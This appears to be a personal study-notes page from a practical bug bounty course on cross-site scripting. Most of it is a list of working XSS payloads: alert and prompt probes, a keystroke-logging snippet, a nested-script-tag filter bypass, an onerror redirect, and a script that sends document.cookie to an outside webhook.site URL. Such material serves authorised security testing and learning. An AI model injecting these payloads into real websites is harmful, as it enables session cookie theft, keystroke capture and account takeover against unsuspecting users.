> For the complete documentation index, see [llms.txt](https://kyou00.gitbook.io/xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kyou00.gitbook.io/xyz/tcm/practical-bug-bounty/xss.md).

# XSS

<figure><img src="/files/zd1aWCrWgySCLWo08vj4" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/iKJITGfbb8gZFMiG951o" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/2QNcOcOnxFbtNmMPWhXL" alt=""><figcaption></figcaption></figure>

<mark style="color:blue;">**TRY USING DOUBLE ENCODING LIKE THE URL, BASE64, ETC**</mark>

```
alert(1)

print()

prompt("hello")
```

<pre><code><strong># everytime you will click a letter will be recorded in the console
</strong>function logKey(event){console.log(event.key)}

document.addEventListener("keydown",logKey)
</code></pre>

<pre><code><strong># Test for HTML injection
</strong><strong># See if it stored XSS
</strong>&#x3C;h1>test&#x3C;/h1>
</code></pre>

<pre><code><strong># Stored XSS
</strong>&#x3C;script>prompt(1)&#x3C;/script>

<strong># It will remove the first &#x3C;script> 
</strong><strong># They it will execute the xss payload
</strong><strong># Also check it is recursively removing the script tag
</strong>&#x3C;scri&#x3C;script>pt>prompt(1)&#x3C;/scri&#x3C;/script>pt>
</code></pre>

<pre><code><strong># Stored XSS
</strong>&#x3C;script>alert(document.cookie)&#x3C;/script>
</code></pre>

<pre><code><strong># It will redirect to google.com
</strong>&#x3C;img src=x onerror="window.location.href='https://google.com'">

<strong># It will spawn the prompt 
</strong><strong># Which indicates we have xss
</strong>&#x3C;img src=x onerror=prompt()>
</code></pre>

{% code overflow="wrap" %}

```
<script>var i = new Image; i.src="https://webhook.site/b5ffbf17-8bfe-4b0f-8361-2d5d4ed67a83/?"+ document.cookie;</script>
```

{% endcode %}
